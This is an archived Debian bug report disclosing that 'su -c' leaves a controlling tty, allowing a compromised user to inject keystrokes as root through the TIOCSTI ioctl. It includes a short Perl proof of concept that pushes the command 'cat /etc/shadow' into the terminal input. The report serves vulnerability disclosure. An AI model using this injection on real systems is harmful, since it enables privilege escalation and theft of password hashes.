[Pkg-shadow-devel] Bug#628843: login: tty hijacking possible in "su" via TIOCSTI ioctl

Daniel Ruoso daniel at ruoso.com
Wed Jun 1 19:24:47 UTC 2011

Package: login
Version: 1:
Severity: critical

After investigating why RedHat have a different behavior regarding "su -c" I
found out that there was a patch in RedHat to prevent tty hijacking when using
"su -c".

What makes the hijacking possible is that "su -c" still gives the command a
controlling tty, which means it has ioctl access to /dev/tty. This means it
can send things to the tty input buffer, which will be read just after su

The original report (with patch) on RedHat (from 2005?!?!?!) is:

A very simple exploit follows (Perl code)

require "sys/ioctl.ph";
open my $tty_fh, '<', '/dev/tty' or die $!;
foreach my $c (split //, 'cat /etc/shadow'.$/) {
    ioctl($tty_fh, &TIOCSTI, $c);

The scenario is:

Root runs a command as a less priviledged user with "su -c", if the user was
compromised, the script will be able to run commands as root by injecting
keystrokes on the terminal.

-- System Information:
Debian Release: 6.0.1
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.32-5-686 (SMP w/1 CPU core)
Locale: LANG=en_US.utf8, LC_CTYPE=en_US.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages login depends on:
ii  libc6                         2.11.2-10  Embedded GNU C Library: Shared lib
ii  libpam-modules                1.1.1-6.1  Pluggable Authentication Modules f
ii  libpam-runtime                1.1.1-6.1  Runtime support for the PAM librar
ii  libpam0g                      1.1.1-6.1  Pluggable Authentication Modules l

login recommends no packages.

login suggests no packages.

-- no debconf information

More information about the Pkg-shadow-devel mailing list